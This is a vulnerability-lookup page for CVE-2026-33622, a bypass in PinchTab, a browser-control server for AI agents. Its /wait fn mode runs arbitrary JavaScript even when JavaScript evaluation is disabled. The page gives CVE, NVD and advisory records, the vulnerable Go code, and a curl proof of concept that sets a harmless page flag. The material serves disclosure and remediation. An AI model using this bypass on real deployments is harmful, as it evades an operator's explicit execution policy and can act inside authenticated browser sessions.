Vulnerability-Lookup

CVE-2026-33622 (GCVE-0-2026-33622)

Vulnerability from cvelistv5 – Published: 2026-03-26 20:44 – Updated: 2026-03-27 20:20

Title

A PinchTab Security Policy Bypass in /wait Allows Arbitrary JavaScript Execution

Summary

PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled. `POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy. This is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation. The current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes. As of time of publication, a patched version is not yet available.

Severity ?

6.1 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N

CWE

CWE-94 - Improper Control of Generation of Code ('Code Injection')
CWE-284 - Improper Access Control
CWE-693 - Protection Mechanism Failure

Assigner

GitHub_M

References

URL

Tags

https://github.com/pinchtab/pinchtab/security/adv…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	pinchtab	pinchtab	Affected: >= 0.8.3, <= 0.8.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33622",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-27T20:19:52.439419Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-27T20:20:00.663Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "pinchtab",
          "vendor": "pinchtab",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.8.3, \u003c= 0.8.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled. `POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy. This is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation. The current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes. As of time of publication, a patched version is not yet available."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "HIGH",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "LOW"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-284",
              "description": "CWE-284: Improper Access Control",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-693",
              "description": "CWE-693: Protection Mechanism Failure",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-26T20:44:48.220Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-w5pc-m664-r62v",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-w5pc-m664-r62v"
        }
      ],
      "source": {
        "advisory": "GHSA-w5pc-m664-r62v",
        "discovery": "UNKNOWN"
      },
      "title": "A PinchTab Security Policy Bypass in /wait Allows Arbitrary JavaScript Execution"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33622",
    "datePublished": "2026-03-26T20:44:48.220Z",
    "dateReserved": "2026-03-23T14:24:11.617Z",
    "dateUpdated": "2026-03-27T20:20:00.663Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33622\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-26T21:17:06.780\",\"lastModified\":\"2026-03-31T16:11:45.657\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled. `POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy. This is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation. The current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes. As of time of publication, a patched version is not yet available.\"},{\"lang\":\"es\",\"value\":\"PinchTab es un servidor HTTP independiente que da a los agentes de IA control directo sobre un navegador Chrome. PinchTab \u0027v0.8.3\u0027 a \u0027v0.8.5\u0027 permiten la ejecuci\u00f3n arbitraria de JavaScript a trav\u00e9s de \u0027POST /wait\u0027 y \u0027POST /tabs/{id}/wait\u0027 cuando la solicitud usa el modo \u0027fn\u0027, incluso si \u0027security.allowEvaluate\u0027 est\u00e1 deshabilitado. \u0027POST /evaluate\u0027 aplica correctamente la protecci\u00f3n \u0027security.allowEvaluate\u0027, que est\u00e1 deshabilitada por defecto. Sin embargo, en las versiones afectadas, \u0027POST /wait\u0027 acept\u00f3 una expresi\u00f3n \u0027fn\u0027 controlada por el usuario, la incrust\u00f3 directamente en JavaScript ejecutable y la evalu\u00f3 en el contexto del navegador sin verificar la misma pol\u00edtica. Esto es una omisi\u00f3n de pol\u00edtica de seguridad en lugar de una omisi\u00f3n de autenticaci\u00f3n separada. La explotaci\u00f3n a\u00fan requiere acceso autenticado a la API, pero un llamador con el token del servidor puede ejecutar JavaScript arbitrario en un contexto de pesta\u00f1a incluso cuando el operador deshabilit\u00f3 expl\u00edcitamente la evaluaci\u00f3n de JavaScript. El \u0027worktree\u0027 actual soluciona esto aplicando el mismo l\u00edmite de pol\u00edtica al modo \u0027fn\u0027 en \u0027/wait\u0027 que ya existe en \u0027/evaluate\u0027, mientras se preservan los modos de espera que no son de c\u00f3digo. A partir del momento de la publicaci\u00f3n, una versi\u00f3n parcheada a\u00fan no est\u00e1 disponible.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":6.1,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"LOW\",\"vulnIntegrityImpact\":\"LOW\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"},{\"lang\":\"en\",\"value\":\"CWE-284\"},{\"lang\":\"en\",\"value\":\"CWE-693\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:pinchtab:pinchtab:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"0.8.3\",\"versionEndIncluding\":\"0.8.5\",\"matchCriteriaId\":\"E8BC24E9-CDA7-402A-AAC5-B47FC6591F59\"}]}]}],\"references\":[{\"url\":\"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-w5pc-m664-r62v\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33622\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-27T20:19:52.439419Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-27T20:19:57.398Z\"}}], \"cna\": {\"title\": \"A PinchTab Security Policy Bypass in /wait Allows Arbitrary JavaScript Execution\", \"source\": {\"advisory\": \"GHSA-w5pc-m664-r62v\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 6.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"HIGH\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"LOW\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"pinchtab\", \"product\": \"pinchtab\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 0.8.3, \u003c= 0.8.5\"}]}], \"references\": [{\"url\": \"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-w5pc-m664-r62v\", \"name\": \"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-w5pc-m664-r62v\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled. `POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy. This is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation. The current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes. As of time of publication, a patched version is not yet available.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-284\", \"description\": \"CWE-284: Improper Access Control\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-693\", \"description\": \"CWE-693: Protection Mechanism Failure\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-26T20:44:48.220Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33622\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-27T20:20:00.663Z\", \"dateReserved\": \"2026-03-23T14:24:11.617Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-26T20:44:48.220Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33622

Vulnerability from fkie_nvd - Published: 2026-03-26 21:17 - Updated: 2026-03-31 16:11

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/pinchtab/pinchtab/security/advisories/GHSA-w5pc-m664-r62v	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	pinchtab	pinchtab	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:pinchtab:pinchtab:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E8BC24E9-CDA7-402A-AAC5-B47FC6591F59",
              "versionEndIncluding": "0.8.5",
              "versionStartIncluding": "0.8.3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled. `POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy. This is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation. The current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes. As of time of publication, a patched version is not yet available."
    },
    {
      "lang": "es",
      "value": "PinchTab es un servidor HTTP independiente que da a los agentes de IA control directo sobre un navegador Chrome. PinchTab \u0027v0.8.3\u0027 a \u0027v0.8.5\u0027 permiten la ejecuci\u00f3n arbitraria de JavaScript a trav\u00e9s de \u0027POST /wait\u0027 y \u0027POST /tabs/{id}/wait\u0027 cuando la solicitud usa el modo \u0027fn\u0027, incluso si \u0027security.allowEvaluate\u0027 est\u00e1 deshabilitado. \u0027POST /evaluate\u0027 aplica correctamente la protecci\u00f3n \u0027security.allowEvaluate\u0027, que est\u00e1 deshabilitada por defecto. Sin embargo, en las versiones afectadas, \u0027POST /wait\u0027 acept\u00f3 una expresi\u00f3n \u0027fn\u0027 controlada por el usuario, la incrust\u00f3 directamente en JavaScript ejecutable y la evalu\u00f3 en el contexto del navegador sin verificar la misma pol\u00edtica. Esto es una omisi\u00f3n de pol\u00edtica de seguridad en lugar de una omisi\u00f3n de autenticaci\u00f3n separada. La explotaci\u00f3n a\u00fan requiere acceso autenticado a la API, pero un llamador con el token del servidor puede ejecutar JavaScript arbitrario en un contexto de pesta\u00f1a incluso cuando el operador deshabilit\u00f3 expl\u00edcitamente la evaluaci\u00f3n de JavaScript. El \u0027worktree\u0027 actual soluciona esto aplicando el mismo l\u00edmite de pol\u00edtica al modo \u0027fn\u0027 en \u0027/wait\u0027 que ya existe en \u0027/evaluate\u0027, mientras se preservan los modos de espera que no son de c\u00f3digo. A partir del momento de la publicaci\u00f3n, una versi\u00f3n parcheada a\u00fan no est\u00e1 disponible."
    }
  ],
  "id": "CVE-2026-33622",
  "lastModified": "2026-03-31T16:11:45.657",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 6.1,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "HIGH",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "HIGH",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "LOW",
          "vulnIntegrityImpact": "LOW",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-26T21:17:06.780",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-w5pc-m664-r62v"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-94"
        },
        {
          "lang": "en",
          "value": "CWE-284"
        },
        {
          "lang": "en",
          "value": "CWE-693"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-W5PC-M664-R62V

Vulnerability from github – Published: 2026-03-24 19:43 – Updated: 2026-03-27 21:19

Summary

A PinchTab Security Policy Bypass in /wait Allows Arbitrary JavaScript Execution

Details

Summary

PinchTab v0.8.3 through v0.8.5 allow arbitrary JavaScript execution through POST /wait and POST /tabs/{id}/wait when the request uses fn mode, even if security.allowEvaluate is disabled.

POST /evaluate correctly enforces the security.allowEvaluate guard, which is disabled by default. However, in the affected releases, POST /wait accepted a user-controlled fn expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy.

This is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation.

The current worktree fixes this by applying the same policy boundary to fn mode in /wait that already exists on /evaluate, while preserving the non-code wait modes.

Details

Issue 1 — /evaluate enforced the guard, /wait did not (v0.8.3 through v0.8.5): The dedicated evaluate endpoint rejected requests when security.allowEvaluate was disabled:

// internal/handlers/evaluate.go — v0.8.5
func (h *Handlers) evaluateEnabled() bool {
    return h != nil && h.Config != nil && h.Config.AllowEvaluate
}

func (h *Handlers) HandleEvaluate(w http.ResponseWriter, r *http.Request) {
    if !h.evaluateEnabled() {
        httpx.ErrorCode(w, 403, "evaluate_disabled", httpx.DisabledEndpointMessage("evaluate", "security.allowEvaluate"), false, map[string]any{
            "setting": "security.allowEvaluate",
        })
        return
    }
    // ...
}

In the same releases, /wait did not apply that guard before evaluating fn:

// internal/handlers/wait.go — v0.8.5 (vulnerable)
func (h *Handlers) handleWaitCore(w http.ResponseWriter, r *http.Request, req waitRequest) {
    mode := req.mode()
    if mode == "" {
        httpx.Error(w, 400, fmt.Errorf("one of selector, text, url, load, fn, or ms is required"))
        return
    }

    // No evaluateEnabled() check here in affected releases
    // ...
}

Issue 2 — fn mode evaluated caller-supplied JavaScript directly: The fn branch built executable JavaScript from the request field and passed it to chromedp.Evaluate:

// internal/handlers/wait.go — v0.8.5 (vulnerable)
case "fn":
    js = fmt.Sprintf(`!!(function(){try{return %s}catch(e){return false}})()`, req.Fn)
    matchLabel = "fn"

// Poll loop
evalErr := chromedp.Run(tCtx, chromedp.Evaluate(js, &result))

Because req.Fn was interpolated directly into evaluated JavaScript, a caller could supply expressions with side effects, not just passive predicates.

Issue 3 — Current worktree contains an unreleased fix: The current worktree closes this gap by making fn mode in /wait respect the same security.allowEvaluate policy boundary that /evaluate already enforced. The underlying non-code wait modes remain available.

PoC

Prerequisites

PinchTab v0.8.3, v0.8.4, or v0.8.5
A configured API token
security.allowEvaluate = false
A reachable tab context, created by the caller or already present

Step 1 — Confirm /evaluate is blocked by policy

curl -s -X POST http://localhost:9867/evaluate \
  -H "Authorization: Bearer <TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{"expression":"1+1"}'

Expected:

{
  "code": "evaluate_disabled"
}

Step 2 — Open a tab

curl -s -X POST http://localhost:9867/navigate \
  -H "Authorization: Bearer <TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{"url":"https://example.com"}'

Example result:

{
  "tabId": "<TAB_ID>",
  "title": "Example Domain",
  "url": "https://example.com/"
}

Step 3 — Execute JavaScript through /wait using fn mode

curl -s -X POST http://localhost:9867/wait \
  -H "Authorization: Bearer <TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{
    "tabId":"<TAB_ID>",
    "fn":"(function(){window._poc_executed=true;return true})()",
    "timeout":5000
  }'

Example result:

{
  "waited": true,
  "elapsed": 1,
  "match": "fn"
}

Step 4 — Verify the side effect

curl -s -X POST http://localhost:9867/wait \
  -H "Authorization: Bearer <TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{
    "tabId":"<TAB_ID>",
    "fn":"window._poc_executed === true",
    "timeout":3000
  }'

Example result:

{
  "waited": true,
  "elapsed": 0,
  "match": "fn"
}

Observation 1. /evaluate returns evaluate_disabled when security.allowEvaluate is off. 2. /wait still evaluates caller-supplied JavaScript through fn mode in the affected releases. 3. The first /wait request introduces a side effect in page state. 4. The second /wait request confirms that the side effect occurred, demonstrating arbitrary JavaScript execution despite the disabled evaluate policy.

Impact

Bypass of the explicit security.allowEvaluate control in v0.8.3 through v0.8.5.
Arbitrary JavaScript execution in the reachable browser tab context for callers who already possess the server API token.
Ability to read or modify page state and act within authenticated browser sessions available to that tab context.
Inconsistent security boundaries between /evaluate and /wait, making the configured execution policy unreliable.
This is not an unauthenticated issue. Practical risk depends on who can access the API and whether the deployment exposes tabs containing sensitive authenticated state.

Suggested Remediation

Make fn mode in /wait enforce the same policy check as /evaluate.
Keep non-code wait modes available when JavaScript evaluation is disabled.
Add regression coverage so the policy boundary remains consistent across endpoints.

Severity ?

6.1 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/pinchtab/pinchtab/cmd/pinchtab"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.8.3"
            },
            {
              "last_affected": "0.8.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/pinchtab/pinchtab"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.8.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33622"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-693",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-24T19:43:30Z",
    "nvd_published_at": "2026-03-26T21:17:06Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nPinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled.\n\n`POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy.\n\nThis is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation.\n\nThe current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes.\n\n### Details\n**Issue 1 \u2014 `/evaluate` enforced the guard, `/wait` did not (`v0.8.3` through `v0.8.5`):**\nThe dedicated evaluate endpoint rejected requests when `security.allowEvaluate` was disabled:\n\n```go\n// internal/handlers/evaluate.go \u2014 v0.8.5\nfunc (h *Handlers) evaluateEnabled() bool {\n    return h != nil \u0026\u0026 h.Config != nil \u0026\u0026 h.Config.AllowEvaluate\n}\n\nfunc (h *Handlers) HandleEvaluate(w http.ResponseWriter, r *http.Request) {\n    if !h.evaluateEnabled() {\n        httpx.ErrorCode(w, 403, \"evaluate_disabled\", 